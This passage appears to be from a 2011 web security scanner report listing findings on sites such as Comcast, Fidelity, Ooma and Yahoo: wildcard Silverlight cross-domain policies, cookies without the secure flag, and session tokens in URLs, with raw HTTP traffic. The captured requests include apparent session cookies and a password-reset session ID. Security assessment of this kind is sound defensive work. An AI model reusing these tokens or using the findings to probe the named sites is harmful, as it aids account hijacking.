X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 59834

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.10. http://serviceo.comcast.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serviceo.comcast.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: serviceo.comcast.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:41 GMT
Server: Omniture DC/2.0.0
xserver: www393
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.11. http://spe.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Sun, 11 Sep 2011 18:38:55 GMT
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.12. http://speed.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:14 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.13. http://whitefence.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: whitefence.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Omniture DC/2.0.0
xserver: www184
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.14. http://www.fidelity.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fidelity.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Fri, 01 Jul 2011 04:42:13 GMT
Content-Length: 449
ETag: "1c1-4e0d5025"
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 12:48:34 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="http://*.fmr.com" />
               <domain uri="https://*.fmr.com" />
               <domain uri="http://*.fidelity.com" />
               <domain uri="https://*.fidelity.com" />
...[SNIP]...

4.15. https://www.fidelity.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fidelity.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Fri, 01 Jul 2011 04:42:13 GMT
ETag: W/"1c1-4e0d5025"
Date: Tue, 06 Sep 2011 12:48:58 GMT
Content-Length: 449
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="http://*.fmr.com" />
               <domain uri="https://*.fmr.com" />
               <domain uri="http://*.fidelity.com" />
               <domain uri="https://*.fidelity.com" />
...[SNIP]...

5. SSL cookie without secure flag set  previous  next
There are 5 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


5.1. https://go.ooma.com/activate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.ooma.com
Path:   /activate

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activate HTTP/1.1
Host: go.ooma.com
Connection: keep-alive
Referer: http://www.ooma.com/premier/features
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; __utmx=238888606.; __utmxx=238888606.; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.4.9.1315330042209; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:26 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 2
ETag: "f35db0f6a1d8e5db3773e81ab260a95a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _myooma_activator_session=BAh7BjoPc2Vzc2lvbl9pZCIlMGVmMmQ4ZmI4NjkyMGVmZDhjZTEwNjcxMzNjZTkwMmY%3D--83b84308728419d82e46f4c6aac067960bf7bbc3; path=/; HttpOnly
Content-Length: 6666
Status: 200
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

5.2. https://go.ooma.com/activate/activation_code  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.ooma.com
Path:   /activate/activation_code

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activate/activation_code HTTP/1.1
Host: go.ooma.com
Connection: keep-alive
Referer: https://go.ooma.com/activate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; __utmx=238888606.; __utmxx=238888606.; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.4.9.1315330042209; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; _myooma_activator_session=BAh7BjoPc2Vzc2lvbl9pZCIlNGM2MzJhOWI3ODE3ZGYxYTE5MjYwZWQ3NDAyZjRhMzU%3D--65ecf6f39771ab33b4a7e4b00e4e18a63f258cb0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:12 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 2
ETag: "a707bda799f1400f40a40290826208eb"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _myooma_activator_session=BAh7BjoPc2Vzc2lvbl9pZCIlNGM2MzJhOWI3ODE3ZGYxYTE5MjYwZWQ3NDAyZjRhMzU%3D--65ecf6f39771ab33b4a7e4b00e4e18a63f258cb0; path=/; HttpOnly
Content-Length: 9128
Status: 200
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

5.3. https://www.fidelity.com/welcome/200-free-trades  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fidelity.com
Path:   /welcome/200-free-trades

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome/200-free-trades HTTP/1.1
Host: www.fidelity.com
Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC=90Vi^mj6PDU08DaQWofS_WBSF08SAk5mFqEKAyjtIAApBQACqjMGBAAAAQAGBU5mFqEAP03

Response

HTTP/1.1 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Length: 27674
Content-Type: text/html;charset=ISO-8859-1
Fsreqid: REQ4e6616b80a0328ee200040e30004aa33
Fscalleeid: fidweb321
Fselapsedtime: 64690
Date: Tue, 06 Sep 2011 12:48:56 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0857CAA8FA2A66D639C8268989A40DB3; path=/


...[SNIP]...

5.4. https://www.comcast.com/Localization/Localize.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Localization/Localize.cspx?Referer=%2FShop%2FBuyFlow2%2Fproducts.cspx&SourcePage=Bundled&FormName=AddressOrZipCode&StreetName=&AptNumber=&Zip= HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331733|PC#1315327839174-766376.19#1316539473|check#true#1315329933; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331673649%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520custcare%2520%7C1315331673661%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":6,"lc":{"d0":{"v":6,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 24713
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; domain=comcast.com; path=/
Date: Tue, 06 Sep 2011 12:24:44 GMT
Connection: Keep-Alive
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...

5.5. https://www.comcast.com/includes/js/IDGenerator.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /includes/js/IDGenerator.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/IDGenerator.ashx HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: https://www.comcast.com/Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; mbox=check#true#1315327900|session#1315327839174-766376#1315329700; s_sess=%20s_cc%3Dtrue%3B%20cf%3D1%3B%20SC_LINKS%3Doto%25202010%2520mvt%2520--%2520cdv02%255E%255Eversion_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255Eoto%25202010%2520mvt%2520--%2520cdv02%2520%257C%2520version_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255E%3B%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_sq%3Dcomcastdotcomprod%253D%252526pid%25253Doto%252525202010%25252520mvt%25252520--%25252520cdv02%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.comcast.com%2525252Fshop%2525252Fbuyflow%2525252Fdefault.ashx%2525253FSourcePage%2525253DVOIP_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20gpv_07%3Doto%25202010%2520mvt%2520--%2520cdv02%7C1315330156032%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B; fsr.a=1315328362332

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 11:59:21 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Set-Cookie: UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Expires: Tue, 06 Sep 2011 11:58:21 GMT
Content-Length: 0


6. Session token in URL  previous  next
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


6.1. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /m2/comcastresidentialservices/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/comcastresidentialservices/mbox/standard?mboxHost=sitesearch.comcast.com&mboxSession=1315327839174-766376&mboxPage=1315329733349-634146&mboxCount=1&internalkeyword=xss&mbox=Search_Image_Promos&mboxId=0&mboxTime=1315311733394&mboxURL=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: comcastresidentialservices.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 174
Date: Tue, 06 Sep 2011 12:22:13 GMT
Server: Test & Target

mboxFactories.get('default').get('Search_Image_Promos',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315327839174-766376.19");

6.2. https://login.comcast.net/myaccount/lookup  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/lookup

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1 HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:26 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=322
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 12359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
   
   
   <title>Forgot your Comcast ID?</title>
   <link rel="stylesheet" type="text/css" href=
...[SNIP]...

6.3. http://omg.yahoo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 70391

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

   
   <title>omg! Celebrity gossip, news, photos, babies, couples, hotties, and more - omg! on Ya
...[SNIP]...
<noscript>
                           <iframe src="/xhr/ad/LREC/2115806991?ref=aHR0cDovL2Zyb250aWVyLm15LnlhaG9vLmNvbS8=&token=f7250a74b26133b5a75cb0774f0712c3" width="300" height="270" frameborder="0" border="0" marginheight="0" marginwidth="0" scrolling="No"></iframe>
...[SNIP]...

6.4. http://omg.yahoo.com/xhr/ad/LREC/2115806991  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115806991

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xhr/ad/LREC/2115806991?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:42 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 4999

<html><body><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=mHDg8mKIOPrpARpjTl.wjQhBMhd7ak5mFjIABjlT&ad_type=iframe&ad_siz
...[SNIP]...

6.5. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=117892634961387&app_id=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2aa62330c%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cb8067c%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bd792ca%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df244af3cd8%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3